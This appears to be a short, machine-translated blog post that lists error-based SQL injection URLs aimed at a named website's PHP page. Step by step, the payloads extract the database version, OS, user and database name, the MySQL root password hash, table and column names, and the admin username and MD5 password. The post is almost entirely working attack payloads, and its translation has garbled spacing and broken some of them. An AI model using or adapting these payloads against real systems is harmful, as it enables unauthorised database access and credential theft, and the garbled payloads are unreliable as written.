Judge version:
Http://www.bkjia.com/7747.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 @ version % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Judgment System
Http://www.bkjia.com/7747.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 @ version_compile_ OS % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Current user ()
Http://www.bkjia.com/7747.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 user () % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Current database ()
Http://www.bkjia.com/7747.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 database () % 20), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Brute-force root hash
Http://www.bkjia.com/7747.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20 Password % 20 from % 20mysql. user % 20 where % 20 User = char (114,111,111,116), 0x3a, floor (rand () * 2 )) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Current Database Table Name
Http://www.bkjia.com/7747.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20TABLE_NAME % 20% 20 from % 20information_schema.tables % 20 where % 20TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49) % 20 limit % 206,1), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
User_name field of the current database
Http://www.bkjia.com/7747.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20% 20COLUMN_NAME % 20 from % 20information_schema.COLUMNS % 20 where % 20TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49) % 20and % 20TABLE_NAME = char (, 115,95, 97,100,109,105,110, 95,117,115,101,114) % 20 limit % 202,1), 0x3a, floor (rand () * 2 )) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Password of the current database Field
Http://www.bkjia.com/7747.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20% 20COLUMN_NAME % 20 from % 20information_schema.COLUMNS % 20 where % 20TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49) % 20and % 20TABLE_NAME = char (, 115,95, 97,100,109,105,110, 95,117,115,101,114) % 20 limit % 204,1), 0x3a, floor (rand () * 2 )) % 20x % 20 from % 20 (select % 201% 20 union % 20 select % 202) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
Obtain admin passwd (md5)
Http://www.bkjia.com/7747.php? Id = 352 & wsid = 1% 20and % 20 () % 3E (select % 20 count (*), concat (select % 20concat_ws (char (94 ), ifnull (cast (% 60 password % 60% 20as % 20 char), char (32), ifnull (cast (% 60user_name % 60% 20as % 20 char ), char (32) % 20% 20 from % 20sansan1. ecs_admin_user % 20 limit % 201%), 0x3a, floor (rand () * 2) % 20x % 20 from % 20 (select % 202 20 union % 20 select %) % 20a % 20 group % 20by % 20x % 20 limit % 201) % 23
This article comes from: semi-pitfall farmer S Blog